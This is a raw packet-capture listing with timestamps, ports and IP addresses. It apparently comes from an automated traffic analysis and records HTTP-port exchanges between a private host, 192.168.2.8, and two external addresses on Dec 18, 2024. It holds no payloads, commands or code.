Dec 18, 2024 13:38:47.863127947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.863266945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.863359928 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.863426924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.864486933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.864552975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.864783049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.864840031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.865478992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.865555048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.884965897 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.885051012 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.996406078 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.996491909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.996546030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.996625900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.996964931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.997040033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.997895956 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.998012066 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.998167038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.998249054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.998354912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.998456001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.999284983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.999464989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.999507904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.999599934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.000498056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.000557899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.000597954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.000648022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.001553059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.001720905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.001781940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.001837015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.002569914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.002629042 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.002798080 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.002847910 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.003716946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.003786087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.004079103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.004141092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.005095005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.005167961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.005348921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.005418062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.006230116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.006285906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.006445885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.006519079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.007257938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.007426977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.007554054 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.007606983 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.008397102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.008512020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.008600950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.008829117 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.009618044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.009730101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.009773970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.009861946 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.010782003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.010840893 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.010921955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.011053085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.012065887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.012116909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.012164116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.012315989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.013164043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.013256073 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.013292074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.013344049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.014446020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.014528990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.014695883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.014761925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.015449047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.015660048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.015667915 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.015737057 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.016705990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.016769886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.016820908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.016899109 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.017846107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.017930031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.018172026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.018255949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.019005060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.019107103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.019134045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.019186974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.020188093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.020267010 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.020437002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.020500898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.021298885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.021430016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.021486998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.021580935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.022551060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.022731066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.022794962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.022794962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.023785114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.023886919 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.023991108 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.024983883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.025002956 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.025080919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.026031017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.026124001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.026293039 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.026351929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.027160883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.027278900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.027338982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.027405977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.028409004 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.028505087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.028585911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.028633118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.029665947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.029722929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.029805899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.029889107 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.030670881 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.030791998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.030796051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.030865908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.031791925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.031887054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.032084942 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.032155037 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.033119917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.033148050 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.033212900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.033212900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.034136057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.034214973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.034306049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.034447908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.035495996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.035569906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.035669088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.035707951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.036984921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.037044048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.037130117 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.037281990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.037961960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.038059950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.038239002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.038333893 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.039437056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.039577961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.039606094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.039673090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.040417910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.040473938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.040576935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.040625095 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.041397095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.041527987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.041548967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.041574001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.042330027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.042387962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.042594910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.042640924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.043509960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.043670893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.043678045 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.043730021 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.044823885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.044842958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.044883013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.044934034 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.045824051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.045922995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.046008110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.046438932 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.047102928 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.047180891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.047357082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.047470093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.048178911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.048264027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.048388958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.048469067 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.049257040 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.049321890 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.049344063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.049407959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.049525976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.049598932 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.050566912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.050642967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.050770998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.050867081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.051820993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.051903009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.051908970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.051966906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.052901030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.052953959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.053092957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.053150892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.054064035 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.054152012 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.054285049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.054393053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.055177927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.055264950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.055502892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.055624962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.056370974 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.056447029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.056552887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.056622982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.057482958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.057606936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.188129902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.188199997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.188224077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.188251019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.188546896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.188716888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.188762903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.188817978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.189604044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.189742088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.189780951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.189907074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.190639019 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.190721035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.190840960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.190912962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.191864014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.191927910 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.191970110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.192080975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.192955971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.193011999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.193185091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.193804979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.194179058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.194232941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.194318056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.194370985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.195396900 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.195558071 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.195593119 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.195658922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.196466923 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.196512938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.196662903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.197395086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.197721004 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.197866917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.197998047 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.198923111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.198991060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.199089050 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.199151993 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.199995041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.200048923 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.200218916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.200665951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.201280117 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.201343060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.201349974 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.201407909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.202377081 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.202461004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.202531099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.202615023 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.203701973 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.203772068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.203790903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.203875065 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.204869032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.204936981 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.204965115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.205017090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.205835104 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.206022024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.206120968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.207026005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.207088947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.207187891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.207237959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.208250999 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.208390951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.208575010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.208698988 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.209506989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.209580898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.209852934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.210536957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.210668087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.210764885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.210819960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.211796045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.211848974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.211910963 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.211947918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.213067055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.213099957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.213167906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.214131117 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.214303017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.214405060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.215265036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.215409040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.215543985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.216373920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.216561079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.216633081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.217582941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.217638016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.217752934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.218807936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.218900919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.218919992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.220071077 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.220164061 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.220195055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.220247984 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.221055031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.221120119 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.221234083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.221285105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.222254992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.222436905 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.222516060 CET	49723	80	192.168.2.8	31.41.244.11
